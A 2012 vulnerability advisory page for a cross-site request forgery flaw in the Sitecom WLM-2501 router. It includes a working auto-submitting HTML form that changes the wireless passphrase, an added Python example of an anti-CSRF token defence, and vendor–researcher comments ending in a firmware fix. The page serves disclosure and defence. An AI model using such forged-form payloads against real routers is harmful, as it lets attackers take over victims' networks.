
Sitecom WLM-2501 Cross Site Request Forgery

Posted Mar 14, 2012
Authored by Ivano Binetti

Sitecom WLM-2501 suffers from a change wireless passphrase cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 855ffffc897003bd05ad527d04c7026d

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Sitecom WLM-2501 Change Wireless Passphrase
# Date : 13-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Vendor site : http://www.sitecom.com/wireless-modem-router-300n/p/859
# Version : WLM-2501
# Tested on : WLM-2501 (all Sitecom WL series devices might be affected by these vulnerabilities)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
2)Vulnerability Description
3)Exploit

+--------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
Sitecom WLM-2501 is a Wireless Modem Router 300N which uses a web management interface - listening by default on TCP port 80
- with "admin" as the default administrator account. Its default IP address is 192.168.0.1.


2)Vulnerability Description
The web interface of this router is affected by multiple CSRF vulnerabilities which allow an attacker to change router parameters and
- among other things - the wireless passphrase, because state-changing POST requests are accepted without any anti-CSRF token.

3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlEncrypt">
<input type="hidden" name="wlanDisabled" value="OFF"/>
<input type="hidden" name="method" value="6"/>
<input type="hidden" name="wpaAuth" value="psk"/>
<input type="hidden" name="pskFormat" value="0"/>
<input type="hidden" name="pskValue" value="newpassword"/>
<input type="hidden" name="submit-url" value="%2Fwlwpa.asp"/>
<input type="hidden" name="save" value="Apply"/>
</form>
</body>
</html>
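The root cause is that the formWlEncrypt handler accepts any POST carrying the admin's session, so a form auto-submitted from another site goes through. The following is an added example (not code from the advisory or from Sitecom's firmware) of the server-side check that would stop it: a per-session synchronizer token plus an Origin/Referer check. The session store, the csrf_token field name and the request dictionaries are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed management-interface location: the advisory's default address, port 80.
ROUTER_HOST, ROUTER_PORT = "192.168.0.1", 80

# Constructed in-memory store: login session id -> anti-CSRF token.
_session_tokens: dict = {}


def issue_token(session_id: str) -> str:
    """Mint a fresh per-session token; the router would embed it as a hidden
    field in its own wlwpa.asp form so the browser echoes it back on submit."""
    token = secrets.token_hex(16)
    _session_tokens[session_id] = token
    return token


def _is_router_origin(url: str) -> bool:
    """True only if an Origin/Referer value points at the router itself."""
    p = urlparse(url)
    return p.scheme == "http" and p.hostname == ROUTER_HOST and (p.port or 80) == ROUTER_PORT


def is_request_allowed(session_id: str, headers: dict, form: dict) -> bool:
    """Gate a state-changing POST such as /goform/admin/formWlEncrypt.

    The session cookie alone is not enough: the body must carry the session's
    token (a third-party page cannot read it), and any Origin/Referer the
    browser attached must name the router (a third-party page cannot forge it).
    An auto-submitted cross-site form therefore fails on both counts."""
    expected = _session_tokens.get(session_id)
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    source = headers.get("Origin") or headers.get("Referer")
    if source and not _is_router_origin(source):
        return False
    return True


# Constructed request body: the advisory's form fields, as a cross-site page would submit them.
FORGED_FORM = {"wlanDisabled": "OFF", "method": "6", "wpaAuth": "psk",
               "pskFormat": "0", "pskValue": "newpassword",
               "submit-url": "/wlwpa.asp", "save": "Apply"}


def demo() -> tuple:
    """Returns (forged_rejected, legitimate_accepted) for a constructed admin session."""
    tok = issue_token("admin-session")
    forged = is_request_allowed("admin-session", {"Origin": "http://other-site.invalid"}, FORGED_FORM)
    legit = is_request_allowed("admin-session", {"Origin": "http://192.168.0.1"}, {**FORGED_FORM, "csrf_token": tok})
    return (not forged, legit)
```

The Origin check also catches a sandboxed or opaque origin (the literal value "null"), since it parses to no hostname and is rejected.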


+--------------------------------------------------------------------------------------------------------------------------------+

Comments (8)

sitecom

Dear Mr. Binetti,

We checked your claim but could not reproduce this, since the router immediately requests the admin password, which is a unique randomly generated password per router. Also, in order to execute the script you need to be connected to the router, for which you already need to know the WiFi password (which is also a unique randomly generated password per router) or be physically connected with a cable.

If you think otherwise please contact us on twitter via @Sitecom_nl

Kind regards,

Sitecom Europe BV
R&D Department

Comment by sitecom
2012-03-14 11:00:22 UTC
ibinetti

Dear Sitecom Europe BV,
this is a CSRF (Cross Site Request Forgery) vulnerability. It means that malicious people can create a specially crafted web page - containing the code which I've inserted in my exploit - in order to change the wireless passphrase when an authenticated administrator browses that crafted web page.

For any question don't hesitate to contact me. In my blog you can find all my references.
Best regards,
Ivano Binetti

Comment by ibinetti
2012-03-14 15:03:03 UTC
sitecom

Dear Mr. Binetti,

Thank you for your additional information, we created a webpage containing your code.
We then logged in on the WLM-2501 User Interface as admin and then in the same session visited the webpage that contained your code.

This resulted in a pop-up with the standard log-in screen that requested the login-name and password. We sent a screenshot to your Twitter account.

Thank you again for mentioning this but we are confident that the issue mentioned by you is not a valid one.

Kind regards,

Sitecom Europe BV
R&D Department

Comment by sitecom
2012-03-14 16:27:26 UTC
ibinetti

Dear Sitecom Europe BV,
I've seen your screenshot and your test result is very strange because, even if the exploit does not work, you should not have to enter authentication credentials again if you're logged in to the web management interface. With my exploit your browser is only performing an HTTP POST request. Why should the router ask you for user/password if you are already logged in?

The main concept behind this exploit is that Sitecom WLM-2501 300N does not use anti-CSRF token.

When I am able to retest the exploit I will send you my feedback.

Best Regards,
Ivano Binetti

Comment by ibinetti
2012-03-14 17:18:02 UTC
ibinetti

The vulnerability which allows changing the wireless passphrase has been confirmed and I've found new CSRF vulnerabilities in order to:

Disable Mac Filtering
Disable/Modify IP/Port Filtering
Disable/Modify Port Forwarding
Disable/Modify Wireless Access Control
Disable Wi-Fi Protected Setup
Disable/Modify URL Blocking Filter
Disable/Modify Domain Blocking Filter
Disable/Modify IP Address ACL
Enable/Modify Remote Access (also on WAN interface)

To know more details about the above vulnerabilities:
packetstormsecurity.org/files/111115/Siteco…

Comment by ibinetti
2012-03-23 11:24:21 UTC
ibinetti

Security Focus has confirmed these vulnerabilities and assigned Bugtraq ID 52700 www.securityfocus.com/bid/52700

Comment by ibinetti
2012-03-26 12:59:08 UTC
sitecom

Dear Mr. Binetti,

We've successfully fixed the above mentioned CSRF Vulnerability issue in firmware 1.03 for the WLM-2501. This firmware has been made available on our website and in the automatic firmware upgrade function that is implemented in the WLM-2501.

Kind regards,

Sitecom Europe BV
R&D Department

Comment by sitecom
2012-03-30 10:02:34 UTC
ibinetti

Great work, great company!

Best regards,
Ivano Binetti

Comment by ibinetti
2012-03-30 14:27:41 UTC